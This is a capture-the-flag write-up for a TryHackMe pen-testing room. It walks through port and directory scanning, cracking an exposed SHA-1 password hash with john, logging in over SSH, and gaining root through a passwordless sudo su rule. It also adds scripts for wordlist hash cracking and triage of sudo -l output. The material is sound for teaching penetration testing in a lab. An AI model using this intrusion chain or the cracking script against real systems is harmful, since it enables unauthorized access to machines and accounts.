
THM: Crash Course Pen Testing

Basic Information

Type: Regular Box
Name: Try Hack Me / CC: Pen Testing
URL: https://tryhackme.com/room/ccpentesting
Author: Asentinn / OkabeRintaro (https://ctftime.org/team/152207)



Contents

  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings


Recon

The target IP is 10.10.113.202; I assign it to a shell variable so the later commands can reuse it.

$ IP=10.10.113.202

Scanning all TCP ports, with default scripts (-sC) and version detection (-sV), and saving the normal output:

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out


Then rescan only the open ports (22 and 80) with XML output, which searchsploit can consume directly to look up known exploits for the detected service versions:

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml


Firing up nikto and ffuf for practice:

$ nikto -h $IP -o nikto-$IP.txt


$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

The ffuf command line can look a little intimidating, so here is what each flag does:

  • -w: wordlist to fuzz with; the :FUZZ suffix names the keyword that each entry replaces
  • -u: target URL, with FUZZ marking the injection point
  • -recursion, -recursion-depth: when ffuf finds a directory it queues another scan of that directory once the current one finishes (you will recognize it by the Job [1/X] label); recursion only works when FUZZ is the last part of the URL, and depth 1 stops after one level
  • -e: simultaneously tries each entry with the listed extensions appended. Be careful with this one, as it multiplies the work by N + 1, where N is the number of extensions (each wordlist entry is requested bare and once per extension)
  • -v: shows the full URL of each finding (useful together with -recursion)
  • -of: output format; raw ffuf output files are not the easiest to read, so I chose Markdown here
  • -o: name of the output file; $IP expands to the target address, so the result lands in fuzz-10.10.113.202.md



Cracking user password

Both tools found the /secret/ directory, and ffuf (thanks to -recursion and -e .txt) also turned up /secret/secret.txt inside it.

$ curl http://$IP/secret/secret.txt


The file contains a single 40-character hex string, almost certainly the hash of a user password. I will use john to crack it; john could be pointed at the file blindly, but out of curiosity let's first run hash-identifier (shipped with Kali) to see what it makes of the value.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8


hash-identifier reports SHA-1 as the most likely candidate. Keep in mind it only guesses from length and character set (40 hex characters could also be RIPEMD-160, for instance), so the cracker is what confirms it. Now cracking it with john, forcing the raw (unsalted) SHA-1 format:

$ john --format=Raw-SHA1 secret.txt


It cracked almost instantly (never use passwords this weak, of course), giving the password nyan. With nyan/nyan as the credentials, try logging in over SSH:

$ ssh nyan@$IP


We're in. Grab the user flag:

nyan@ubuntu:~$ cat user.txt
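To make explicit what hash-identifier and john did above, here is an added shell example (not from the original writeup) that guesses the algorithm from the digest length and then tries every word of a wordlist using the coreutils sha1sum/md5sum/sha256sum tools. It assumes an unsalted hex digest and a plain-text wordlist with one candidate per line; the demo wordlist is constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the original writeup: identify-then-crack an
# unsalted hex digest with nothing but POSIX sh and coreutils.
# Assumes: sha1sum, md5sum and sha256sum are available; wordlist is one word per line.

# Guess the algorithm from length and character set only. This is exactly as
# (un)reliable as hash-identifier: 32 hex chars may be MD5 or NTLM, 40 may be
# SHA-1 or RIPEMD-160. Treat the answer as a hint, not proof.
identify_hash() {
    case "$1" in
        *[!0-9A-Fa-f]*) echo "not-hex"; return 1 ;;
    esac
    case "${#1}" in
        32) echo "md5-or-ntlm" ;;
        40) echo "sha1" ;;
        64) echo "sha256" ;;
        *)  echo "unknown"; return 1 ;;
    esac
}

# digest <coreutils-tool> <string>: hex digest of the exact bytes of <string>.
# printf '%s' is deliberate; echo would append a newline and hash the wrong bytes.
digest() {
    printf '%s' "$2" | "$1" | cut -d' ' -f1
}

# crack_hash <hex-digest> <wordlist-file>
# Prints the first matching word and returns 0, or returns 1 if nothing matched.
crack_hash() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$(identify_hash "$target")" in
        sha1)        tool=sha1sum ;;
        md5-or-ntlm) tool=md5sum ;;    # tries MD5 only; NTLM needs another tool
        sha256)      tool=sha256sum ;;
        *) echo "unsupported hash: $1" >&2; return 1 ;;
    esac
    # The || [ -n "$word" ] keeps the last line even if the file lacks a trailing newline.
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(digest "$tool" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo against the digest found in /secret/secret.txt, with a constructed
# five-word list standing in for rockyou.txt.
demo() {
    wl=$(mktemp)
    printf '%s\n' password 123456 letmein nyan admin > "$wl"
    crack_hash 046385855FC9580393853D8E81F240B66FE9A7B8 "$wl"
    rc=$?
    rm -f "$wl"
    return $rc
}
```

Usage: source the file and call `crack_hash <hash> /usr/share/wordlists/rockyou.txt`, or run `demo`. This is a plain sequential loop, so it is orders of magnitude slower than john or hashcat; the point is to show that "cracking" a fast unsalted hash is just hashing guesses and comparing, which is why a password like nyan falls immediately.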


Elevating privileges

First check what sudo rights the new user has:

nyan@ubuntu:~$ sudo -l

The output shows that user nyan can run /bin/su as root without supplying a password (a NOPASSWD rule in sudoers).

Merely seeing such an entry tells us that nyan is allowed to use sudo at all; otherwise sudo -l would print Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the hostname).

Since su on its own opens a root shell, running it through that sudo rule (sudo su) gives root with no password prompt at all. We got root! So cat out the flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt
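As an added example (not from the original writeup), here is a small shell helper that triages sudo -l output for exactly this pattern: it tells whether the account has any sudo rule at all, lists the commands runnable as root with NOPASSWD, and flags the su case. The sudo -l text below is a constructed sample matching the entry described above, not a capture from the box; the code assumes POSIX sh, grep and awk.

```shell
#!/bin/sh
# Added example, not part of the original writeup: triage captured `sudo -l`
# output. Assumes POSIX sh, grep and awk; input is a file holding the text.

# Constructed sample mirroring the rule described in the writeup.
SAMPLE_SUDO_L='Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su'

# Constructed sample of the "no sudo at all" case.
SAMPLE_DENIED='Sorry, user nyan may not run sudo on ubuntu.'

# sudo_rights <file>: 0 if the user has at least one sudo rule, 1 if denied.
sudo_rights() {
    if grep -q 'may not run sudo' "$1"; then
        return 1
    fi
    grep -q 'may run the following commands' "$1"
}

# nopasswd_root_cmds <file>: print every command the user may run as root
# (runas "root" or "ALL") without a password, one per line. A rule line can
# list several comma-separated commands, so each is printed separately.
nopasswd_root_cmds() {
    awk '
        /^[ \t]*\((root|ALL)(:[^)]*)?\)[ \t]+.*NOPASSWD:/ {
            sub(/^.*NOPASSWD:[ \t]*/, "")        # drop the runas/tag prefix
            n = split($0, cmds, /,[ \t]*/)      # one command per element
            for (i = 1; i <= n; i++) print cmds[i]
        }' "$1"
}

# can_su_root <file>: 0 if `sudo su` (or any command via ALL) yields a
# root shell with no password prompt, 1 otherwise.
can_su_root() {
    nopasswd_root_cmds "$1" | grep -qx -e '/bin/su' -e '/usr/bin/su' -e 'ALL'
}

# Human-readable report for a captured sudo -l file.
report() {
    if ! sudo_rights "$1"; then
        echo "no sudo rights"
        return 1
    fi
    echo "NOPASSWD root commands:"
    nopasswd_root_cmds "$1" | sed 's/^/  /'
    if can_su_root "$1"; then
        echo "=> 'sudo su' gives a root shell without a password"
    fi
}
```

Usage: `sudo -l > sudo-l.txt` on the target, then `report sudo-l.txt` locally. The same awk filter catches any other NOPASSWD binary (editors, find, interpreters); only the final grep in can_su_root is specific to su.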

Additional readings

📌 Follow the #CyberEthical hashtag on the social media
🎁 Become a Patron and gain additional benefits
👾 Join CyberEthical Discord server
👉 Instagram: @cyber.ethical.me
👉 LinkedIn: Kamil Gierach-Pacanek
👉 Twitter: @cyberethical_me
👉 Facebook: @CyberEthicalMe
